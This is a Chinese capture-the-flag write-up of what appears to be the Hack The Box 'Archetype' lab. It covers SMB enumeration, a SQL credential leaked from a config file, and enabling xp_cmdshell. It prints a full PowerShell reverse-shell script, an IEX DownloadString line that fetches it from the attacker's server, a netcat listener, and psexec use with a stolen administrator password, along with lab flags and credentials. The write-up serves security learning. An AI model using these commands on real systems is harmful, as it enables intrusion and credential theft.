# 资料
- smbclient
- impacket
- github-winPEAS# Task 1
# Task 1
Q:Which TCP port is hosting a database server?
┌──(root💀kali)-[~/桌面] | |
└─# nmap -sV -Pn 10.129.233.35 | |
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-06 11:29 CST | |
Nmap scan report for 10.129.233.35 | |
Host is up (0.44s latency). | |
Not shown: 996 closed tcp ports (reset) | |
PORT STATE SERVICE VERSION | |
135/tcp open msrpc Microsoft Windows RPC | |
139/tcp open netbios-ssn Microsoft Windows netbios-ssn | |
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds | |
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000 | |
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 22.51 seconds |
可以看到 1433 端口开启了 sql 服务
A:1433
# Task 2
Q:What is the name of the non-Administrative share available over SMB?
┌──(root💀kali)-[~/桌面] | |
└─# smbclient -N -L 10.129.233.35 1 ⨯ | |
Sharename Type Comment | |
--------- ---- ------- | |
ADMIN$ Disk Remote Admin | |
backups Disk | |
C$ Disk Default share | |
IPC$ IPC Remote IPC | |
Reconnecting with SMB1 for workgroup listing. | |
do_connect: Connection to 10.129.233.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) | |
Unable to connect with SMB1 -- no workgroup available |
A: backups
# Task 3
Q:What is the password identified in the file on the SMB share?
┌──(root💀kali)-[~/桌面] | |
└─# smbclient //10.129.233.35/backups | |
Enter WORKGROUP\root's password: | |
Try "help" to get a list of possible commands. | |
smb: \> ls | |
. D 0 Mon Jan 20 20:20:57 2020 | |
.. D 0 Mon Jan 20 20:20:57 2020 | |
prod.dtsConfig AR 609 Mon Jan 20 20:23:02 2020 | |
5056511 blocks of size 4096. 2609319 blocks available | |
smb: \> get prod.dtsConfig | |
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) | |
smb: \> exit | |
┌──(root💀kali)-[~/桌面] | |
└─# cat prod.dtsConfig | |
<DTSConfiguration> | |
<DTSConfigurationHeading> | |
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/> | |
</DTSConfigurationHeading> | |
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String"> | |
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue> | |
</Configuration> | |
</DTSConfiguration> |
连进 backups,然后下载 config 文件,查看,可以看到里面有一个 password
这个 prod.dtsConfig
应该是 MySQL 的一个配置文件,原名应该是 myconfig.dtsConfig
A:M3g4c0rp123
# Task 4
Q:What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
┌──(root💀kali)-[~/桌面] | |
└─# impacket-m | |
Completing external command | |
impacket-mimikatz impacket-mssqlclient | |
impacket-mqtt_check impacket-mssqlinstance |
这个 impacket
是一个工具集,里面很多东西,发现宝贝了
A:mssqlclient.py
# Task 5
Q:What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
A:xp_cmdshell
# Task 6
Q:What script can be used in order to search possible paths to escalate privileges on Windows hosts?
这是个提权工具
A:winPEAS
# Task 7
Q:What file contains the administrator's password?
这个问的是 sql 里面那个文件包含着 administrator 的密码
靶机里的路径是 C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
A: ConsoleHost_history.txt
# Task 8
Q:Submit user flag
这个要获取 user 的 flag,那么我们就按照它题目的思路来咯
先连到 SQL 上,账号密码使用 Task3 中泄露的一组
┌──(root💀kali)-[~/桌面] | |
└─# impacket-mssqlclient ARCHETYPE/sql_svc@10.129.68.73 -windows-auth | |
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation | |
Password: | |
[*] Encryption required, switching to TLS | |
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master | |
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english | |
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 | |
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'. | |
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english. | |
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) | |
[!] Press help for extra shell commands | |
SQL> |
查看是否是 sa 权限
SQL> SELECT IS_SRVROLEMEMBER('sysadmin') | |
----------- | |
1 |
显式了 1,说明是有 sysadmin 权限的
接下来修改数据库配置信息,为了能让 SQL Server 使用系统调用
EXEC sp_configure 'Show Advanced Options', 1; \\使用sp_configure系统存储过程,设置服务器配置选项,将Show Advanced Options设置为1时,允许修改数据库的高级配置选项 | |
reconfigure; \\确认上面的操作 | |
sp_configure; \\查看当前sp_configure配置情况 | |
EXEC sp_configure 'xp_cmdshell', 1 \\使用sp_configure系存储过程,启用xp_cmdshell参数,来允许SQL Server调用操作系统命令 | |
reconfigure; \\确认上面的操作 | |
xp_cmdshell "whoami" \\在靶机上调用cmdshell执行whoami |
最后的命令输出如下:
SQL> xp_cmdshell "whoami" | |
output | |
-------------------------------------------------------------------------------- | |
archetype\sql_svc | |
NULL |
这个时候我们已经拥有了部分 os-shell 了,接下来获取完整 shell,我们通过反弹 shell 的方式
首先在攻击机上创建一个 ps1 的 powershell 脚本,内容如下:
$client = New-Object System.Net.Sockets.TCPClient("内网IP",4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
这是一个反弹连接,所以 IP 要填自己的 IP,我的文件名是 shell.ps1
然后使用 python 上线 http 服务
┌──(root💀kali)-[~/桌面] | |
└─# python3 -m http.server 80 | |
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... |
新建一个终端开启 nc 监听 4443
┌──(root💀kali)-[~/桌面] | |
└─# nc -lvnp 4443 | |
listening on [any] 4443 ... |
nc 参数
-l 代表监听模式 | |
-v 代表输出详细报告 | |
-n 代表不执行DNS查询,如果使用的是域名就不能加入该参数 | |
-p 指定端口号 |
这回可以切回 SQL 执行 payload,进行反弹链接了
SQL> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.16.86/shell.ps1\");"" | |
output | |
-------------------------------------------------------------------------------- | |
Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (404) Not Found." | |
At line:1 char:1 | |
+ IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.86/a.p ... | |
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException | |
+ FullyQualifiedErrorId : WebException | |
NULL |
这个时候我们可以看到 http 服务和 nc 都有有了反应
HTTP
┌──(root💀kali)-[~/桌面] | |
└─# python3 -m http.server 80 | |
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... | |
10.129.68.73 - - [06/May/2022 13:49:47] "GET /shell.ps1 HTTP/1.1" 200 - |
nc
┌──(root💀kali)-[~/桌面] | |
└─# nc -lvnp 4443 | |
listening on [any] 4443 ... | |
connect to [10.10.16.86] from (UNKNOWN) [10.129.68.73] 49678 | |
# # |
现在就可以用 nc 查看 user flag 了
同时查看一下 administrator 的密码,为下一题做准备
# type C:\Users\sql_svc\Desktop\user.txt | |
3e7b102e78218e935bf3f4951fec21a3 | |
# type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt | |
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!! |
A: 3e7b102e78218e935bf3f4951fec21a3
# Task 9
Q:Submit root flag
上一题已经得到了 administrator 的密码了,我们直接连上去读取就行了
┌──(root💀kali)-[~/桌面] | |
└─# impacket-psexec administrator@10.129.68.73 1 ⨯ | |
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation | |
Password: | |
[*] Requesting shares on 10.129.68.73..... | |
[*] Found writable share ADMIN$ | |
[*] Uploading file CtOoJpyb.exe | |
[*] Opening SVCManager on 10.129.68.73..... | |
[*] Creating service DdAP on 10.129.68.73..... | |
[*] Starting service DdAP..... | |
[!] Press help for extra shell commands | |
Microsoft Windows [Version 10.0.17763.2061] | |
(c) 2018 Microsoft Corporation. All rights reserved. | |
C:\Windows\system32> |
可以看到返回了 shell
我们读取 flag 就行
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt | |
b91ccec3305e98240082d4474b848528 |
A: b91ccec3305e98240082d4474b848528
结束!牛逼!
